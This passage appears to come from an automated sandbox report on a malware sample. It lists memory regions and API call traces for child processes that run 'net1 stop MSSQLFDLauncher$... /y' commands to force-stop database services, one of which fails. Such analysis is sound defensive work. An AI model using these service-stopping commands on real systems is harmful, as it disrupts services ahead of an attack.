= 8524 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8525 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8526 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8527 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8528 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8529 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8530 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8531 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8532 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 676 os_tid = 0xb6c Process: id = "218" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5d1ec000" os_pid = "0xa80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "212" os_parent_pid = "0x950" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8533 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8534 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8535 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8536 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 8537 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8538 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8539 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8540 start_va = 0xffa10000 end_va = 0xffa42fff entry_point = 0xffa10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8541 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8542 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8543 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 8544 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8545 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 8546 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8547 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8548 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8549 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8550 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8551 start_va = 0x140000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 8552 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 8553 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8554 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8555 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8556 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8557 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8558 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8559 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8560 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8561 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8562 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8563 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8564 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8565 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8566 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8567 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8568 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8569 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8570 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8571 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 678 os_tid = 0xb24 [0106.367] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcff30 | out: lpSystemTimeAsFileTime=0xcff30*(dwLowDateTime=0xf48d1ff0, dwHighDateTime=0x1d48689)) [0106.367] GetCurrentProcessId () returned 0xa80 [0106.367] GetCurrentThreadId () returned 0xb24 [0106.367] GetTickCount () returned 0x24549 [0106.367] QueryPerformanceCounter (in: lpPerformanceCount=0xcff38 | out: lpPerformanceCount=0xcff38*=1815328500000) returned 1 [0106.369] GetModuleHandleW (lpModuleName=0x0) returned 0xffa10000 [0106.369] __set_app_type (_Type=0x1) [0106.369] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa29c9c) returned 0x0 [0106.369] __getmainargs (in: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788, _DoWildCard=0, _StartInfo=0xffa3479c | out: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788) returned 0 [0106.369] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.369] GetConsoleOutputCP () returned 0x1b5 [0106.490] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa3cec0 | out: lpCPInfo=0xffa3cec0) returned 1 [0106.491] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0106.493] sprintf_s (in: _DstBuf=0xcfed8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.493] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0106.494] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0106.495] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPSAMA /y" [0106.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcfc70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0106.495] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.495] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfec8 | out: Buffer=0xcfec8*=0x274d60) returned 0x0 [0106.495] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xcfec8 | out: Buffer=0xcfec8*=0x27c130) returned 0x0 [0106.495] _fileno (_File=0x7fefdba2a80) returned 0 [0106.495] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0106.495] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.495] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.495] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.495] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.495] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.495] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.495] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.495] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.495] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.496] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.496] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.496] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.496] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.496] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.496] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.496] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.496] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.496] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.496] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.496] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.496] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.496] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$TPSAMA") returned -12 [0106.496] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0106.496] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0106.496] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0106.496] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$TPSAMA") returned -10 [0106.496] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$TPSAMA") returned -7 [0106.496] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$TPSAMA") returned -7 [0106.497] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$TPSAMA") returned -6 [0106.497] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$TPSAMA") returned -6 [0106.497] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$TPSAMA") returned -5 [0106.497] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$TPSAMA") returned -5 [0106.497] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$TPSAMA") returned -1 [0106.497] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$TPSAMA") returned 3 [0106.497] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$TPSAMA") returned 7 [0106.497] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$TPSAMA") returned 8 [0106.497] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$TPSAMA") returned 8 [0106.497] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$TPSAMA") returned -12 [0106.497] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$TPSAMA") returned -14 [0106.497] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0106.497] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0106.497] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$TPSAMA") returned 1 [0106.497] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0106.497] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0106.497] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$TPSAMA") returned 5 [0106.497] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$TPSAMA") returned 10 [0106.497] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$TPSAMA") returned 10 [0106.497] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$TPSAMA") returned 10 [0106.497] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$TPSAMA") returned 3 [0106.497] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$TPSAMA") returned -9 [0106.497] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$TPSAMA") returned -1 [0106.497] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.497] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.498] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$TPSAMA") returned 6 [0106.498] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$TPSAMA") returned -1 [0106.498] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$TPSAMA") returned -12 [0106.498] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$TPSAMA") returned 1 [0106.498] _wcsupr (in: _String="MSSQLFDLauncher$TPSAMA" | out: _String="MSSQLFDLAUNCHER$TPSAMA") returned="MSSQLFDLAUNCHER$TPSAMA" [0106.498] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x27ce40 [0106.502] GetServiceKeyNameW (in: hSCManager=0x27ce40, lpDisplayName="MSSQLFDLAUNCHER$TPSAMA", lpServiceName=0xffa35750, lpcchBuffer=0xcfde8 | out: lpServiceName="", lpcchBuffer=0xcfde8) returned 0 [0106.503] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -12 [0106.503] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -14 [0106.503] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0106.503] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0106.503] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0106.503] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0106.503] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 5 [0106.503] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 10 [0106.503] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 10 [0106.503] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 10 [0106.503] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 3 [0106.503] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -9 [0106.503] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -1 [0106.503] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 6 [0106.503] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 6 [0106.503] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 6 [0106.504] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -1 [0106.504] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$TPSAMA") returned -12 [0106.504] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$TPSAMA") returned 1 [0106.504] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$TPSAMA", opcode=0x0, arg=0x0, bufptr=0xcfdf0 | out: bufptr=0xcfdf0) returned 0x889 [0106.504] wcscpy_s (in: _Destination=0xffa380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.504] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0106.505] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.507] GetFileType (hFile=0xb) returned 0x2 [0106.507] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfcb8 | out: lpMode=0xcfcb8) returned 1 [0106.508] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcfcb0, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0xcfcb0*=0x1e) returned 1 [0106.508] GetFileType (hFile=0xb) returned 0x2 [0106.508] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfcb8 | out: lpMode=0xcfcb8) returned 1 [0106.508] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfcb0, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0xcfcb0*=0x2) returned 1 [0106.509] _ultow (in: _Dest=0x889, _Radix=851232 | out: _Dest=0x889) returned="2185" [0106.509] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.509] GetFileType (hFile=0xb) returned 0x2 [0106.509] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfcb8 | out: lpMode=0xcfcb8) returned 1 [0106.509] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xcfcb0, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0xcfcb0*=0x34) returned 1 [0106.510] GetFileType (hFile=0xb) returned 0x2 [0106.510] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xcfcb8 | out: lpMode=0xcfcb8) returned 1 [0106.510] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcfcb0, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0xcfcb0*=0x2) returned 1 [0106.510] NetApiBufferFree (Buffer=0x274d60) returned 0x0 [0106.510] NetApiBufferFree (Buffer=0x27c130) returned 0x0 [0106.510] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$TPSAMA /y" [0106.510] exit (_Code=2) Process: id = "219" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5c5b6000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xc10" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8572 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8573 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8574 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8575 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 8576 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8577 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8578 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8579 start_va = 0xffa10000 end_va = 0xffa42fff entry_point = 0xffa10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8580 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8581 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8582 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 8583 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8584 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8585 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8586 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8587 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8588 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8589 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8590 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 8591 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 8592 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8593 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8594 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8595 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8596 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8597 start_va = 0x7fefb7c0000 end_va = 